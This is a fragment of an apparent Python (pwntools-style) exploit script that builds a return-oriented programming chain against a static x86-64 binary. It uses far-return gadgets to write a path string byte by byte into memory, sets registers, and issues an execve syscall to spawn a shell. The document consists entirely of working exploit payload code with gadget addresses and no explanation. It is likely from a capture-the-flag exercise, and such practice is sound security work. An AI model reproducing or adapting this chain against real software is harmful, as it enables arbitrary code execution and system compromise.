payload = p64(0x4250bc)
#0x4250bc: pop rax ; retf
payload += p64(0x4470cf)+p32(0x41f51a)+p32(0x33)
# 0x41f51a: pop rcx ; retf
payload += p64(0x2f)+p32(0x42af34)+p32(0x33)
# 0x42af34: or byte ptr [rax - 0x77], cl ; fucompi st(0) ; retf
payload += p32(0x4250bc)+p32(0x33)
# 0x4250bc: pop rax ; retf
payload += p64(0x4470d0)+p32(0x41f51a)+p32(0x33)
# 0x41f51a: pop rcx ; retf
payload += p64(0x62)+p32(0x42af34)+p32(0x33)
# 0x42af34: or byte ptr [rax - 0x77], cl ; fucompi st(0) ; retf
payload += p32(0x4250bc)+p32(0x33)
# 0x4250bc: pop rax ; retf
payload += p64(0x4470d1)+p32(0x41f51a)+p32(0x33)
# 0x41f51a: pop rcx ; retf
payload += p64(0x69)+p32(0x42af34)+p32(0x33)
# 0x42af34: or byte ptr [rax - 0x77], cl ; fucompi st(0) ; retf
payload += p32(0x4250bc)+p32(0x33)
# 0x4250bc: pop rax ; retf
payload += p64(0x4470d2)+p32(0x41f51a)+p32(0x33)
# 0x41f51a: pop rcx ; retf
payload += p64(0x6e)+p32(0x42af34)+p32(0x33)
# 0x42af34: or byte ptr [rax - 0x77], cl ; fucompi st(0) ; retf
payload += p32(0x4250bc)+p32(0x33)
# 0x4250bc: pop rax ; retf
payload += p64(0x4470d3)+p32(0x41f51a)+p32(0x33)
# 0x41f51a: pop rcx ; retf
payload += p64(0x2f)+p32(0x42af34)+p32(0x33)
# 0x42af34: or byte ptr [rax - 0x77], cl ; fucompi st(0) ; retf
payload += p32(0x4250bc)+p32(0x33)
# 0x4250bc: pop rax ; retf
payload += p64(0x4470d4)+p32(0x41f51a)+p32(0x33)
# 0x41f51a: pop rcx ; retf
payload += p64(0x66)+p32(0x42af34)+p32(0x33)
# 0x42af34: or byte ptr [rax - 0x77], cl ; fucompi st(0) ; retf
payload += p32(0x4250bc)+p32(0x33)
# 0x4250bc: pop rax ; retf
payload += p64(0x4470d5)+p32(0x41f51a)+p32(0x33)
# 0x41f51a: pop rcx ; retf
payload += p64(0x68)+p32(0x42af34)+p32(0x33)
# 0x42af34: or byte ptr [rax - 0x77], cl ; fucompi st(0) ; retf
payload += p32(0x4250bc)+p32(0x33)
# 0x4250bc: pop rax ; retf
payload += p64(0x4470d6)+p32(0x41f51a)+p32(0x33)
# 0x41f51a: pop rcx ; retf
payload += p64(0x0)+p32(0x42af34)+p32(0x33)
# 0x42af34: or byte ptr [rax - 0x77], cl ; fucompi st(0) ; retf
payload += p32(0x4250bc)+p32(0x33)
# 0x4250bc: pop rax ; retf
payload += p64(0x447058)+p32(0x420f89)+p32(0x33)
# 0x0000000000420f89: xchg edi, eax; ret; 
payload += p64(0x4250bc)
# 0x4250bc: pop rax ; retf
payload += p64(0x0)+p32(0x432b9e)+p32(0x33)
# 0x0000000000432b9e: xchg esi, eax; ret; 
payload += p64(0x4250bc)
# 0x4250bc: pop rax ; retf
payload += p64(0x0)+p32(0x436b8b)+p32(0x33)
# 0x0000000000436b8b: xchg edx, eax; ret 0x148; 
payload += p64(0x4250bc)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)
# 0x4250bc: pop rax ; retf
payload += p64(0x3b)+p32(0x40ae25)+p32(0x33)
# 0x000000000040ae25: syscall; 
payload += b''
